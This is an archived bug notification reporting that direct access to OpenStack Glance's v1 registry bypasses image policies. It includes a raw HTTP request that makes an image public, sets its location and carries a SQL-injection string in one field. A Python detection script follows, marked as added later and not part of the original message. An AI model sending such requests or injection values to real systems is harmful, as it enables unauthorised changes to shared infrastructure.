yahoo-eng-team team mailing list archive
Message #85646
[Bug 1556023] Re: Direct v1 registry access can bypass Glance's policies
Glance does not support V1 and it has been removed since Ussuri.
** Changed in: glance
Status: New => Won't Fix
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1556023
Title:
Direct v1 registry access can bypass Glance's policies
Status in Glance:
Won't Fix
Status in OpenStack Security Advisory:
Won't Fix
Bug description:
If a non-admin user can access the registry directly, then they can
bypass Glance's policies.
Here, for example, is a registry request which bypasses both the
policy to mark an image as public, and to set the image location
directly:
PUT /images/37d89430-8bf2-433a-843e-909c752866df HTTP/1.1.
Host: 127.0.0.1:9191.
Content-Length: 606.
Accept-Encoding: gzip, deflate.
Accept: application/json.
x-auth-token: dc9e09e4954d4b42983784b3c4642bd9.
Connection: keep-alive.
User-Agent: restfuzz-0.1.0.
Content-Type: application/json.
.
{"image": {"status": "active", "deleted": false, "name":
"testpublic", "container_format": "bare", "min_ram": 2147483647,
"disk_format": "qcow2", "id": "37d89430-8bf2-433a-843e-909c752866df",
"owner": "48c21395db63405d94aee1f965615d1c", "min_disk": 2147483647,
"is_public": true, "properties": {"image_type": "snapshot",
"instance_uuid": "7df74ad1-1caf-44ac-8f4b-4313f5fda5ed", "user_id":
"76b4ded518594216832e06c261523074' or 1=1--", "base_image_ref":
"1c8c3ba8-3a2f-4d06-b1ba-ac1791b599d8"}, "size": 6599958588555,
"virtual_size": 6599958588551, "min_disk": 2147483647,
"location":"http://google.com"}}
Note that deployments should firewall the registry off; typical users should only have access to the Glance API endpoint.
However, users such as a Swift administrator who does not have Glance admin powers but is able to access the 'private' network can bypass Glance's policies.
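The firewalling advice in the report can be backed by a detection check. The following is an added example, not part of the original message or of Glance: it flags registry requests that do not come from a Glance API node and notes when they make the two policy-controlled changes the report names. The record format, the allowed address and the sample records are assumptions constructed for illustration.

```python
import ipaddress
import json

# Assumption: the only hosts allowed to reach the registry (port 9191 in the
# report) are the Glance API nodes. This address is a constructed placeholder.
ALLOWED_CLIENTS = {ipaddress.ip_address("10.0.0.5")}

def audit_registry_request(record):
    """Return findings for one captured registry request.

    `record` is a hypothetical capture format: a dict with the keys
    'src', 'method', 'path' and 'body' (raw JSON text or None).
    """
    src = ipaddress.ip_address(record["src"])
    if src in ALLOWED_CLIENTS:
        return []
    findings = [f"registry reached directly from {src}"]
    if record["method"] not in ("PUT", "POST"):
        return findings
    if not record["path"].startswith("/images"):
        return findings
    try:
        doc = json.loads(record["body"] or "{}")
    except json.JSONDecodeError:
        return findings + ["body is not valid JSON"]
    image = doc.get("image") if isinstance(doc, dict) else None
    if not isinstance(image, dict):
        return findings
    # The two policy-controlled changes named in the report.
    if image.get("is_public") is True:
        findings.append("marks image public")
    if image.get("location"):
        findings.append("sets image location")
    return findings

# Constructed sample records; the second mirrors the shape of the reported request.
SAMPLES = [
    {"src": "10.0.0.5", "method": "PUT", "path": "/images/example-id",
     "body": '{"image": {"is_public": true}}'},
    {"src": "10.0.0.77", "method": "PUT", "path": "/images/example-id",
     "body": '{"image": {"is_public": true, "location": "http://example.invalid/img"}}'},
    {"src": "10.0.0.77", "method": "GET", "path": "/images/detail", "body": None},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec["src"], rec["method"], rec["path"], audit_registry_request(rec))
```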